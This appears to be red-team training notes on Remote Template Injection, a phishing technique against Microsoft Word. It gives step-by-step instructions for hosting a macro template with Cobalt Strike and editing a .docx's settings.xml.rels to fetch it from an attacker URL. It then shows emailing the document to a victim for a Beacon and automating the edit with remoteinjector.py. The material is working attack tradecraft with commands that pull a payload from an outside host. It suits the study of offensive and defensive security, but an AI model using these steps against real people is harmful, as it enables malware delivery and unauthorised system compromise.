# Remote Template Injection Microsoft Word has the option of creating new documents from a template. Office has some templates pre-installed, you can make custom templates, and even download new ones. Remote Template Injection is a technique where an attacker sends a benign document to a victim, which downloads and loads a malicious template. This template may hold a macro, leading to code execution. Open Word on the Attacker Desktop, create a new blank document and insert your desired macro. Save this to `C:\Payloads` as a Word 97-2003 Template (\*.dot) file. This is now our "malicious remote template". Use Cobalt Strike to host this file at **. Next, create a new document from the blank template located in `C:\Users\Attacker\Documents\Custom Office Templates`. Add any content you want, then save it to `C:\Payloads` as a new .docx. Browse to the directory in explorer, right-click and select *7-Zip > Open archive*. Navigate to \_word > \_rels, r\_ight-click on `settings.xml.rels` and select *Edit*. This is just a small XML file. Scroll right until you see the *Target* entry. ``` Target="file:///C:\Users\Attacker\Documents\Custom%20Office%20Templates\Blank%20Template.dotx" ``` \\ It's currently pointing to the template on our local disk from which the document was created. Simply modify this so it points to the template URL instead. ``` Target="http://nickelviper.com/template.dot" ``` \\ Save those changes and email the document to Bob. Once the file is opened, you'll see a warning about macros again but allowing them to run will execute the macro in the hosted template, given us a Beacon. \\ *** \\ [John Woodman](https://twitter.com/JohnWoodman15) created a [python tool](https://github.com/JohnWoodman/remoteinjector) that can automate this process so that we don't have to modify the XML manually. ``` ubuntu@DESKTOP-3BSK7NO ~> python3 remoteinjector.py -w http://nickelviper.com/template.dot /mnt/c/Payloads/document.docx URL Injected and saved to /mnt/c/Payloads/document_new.docx ```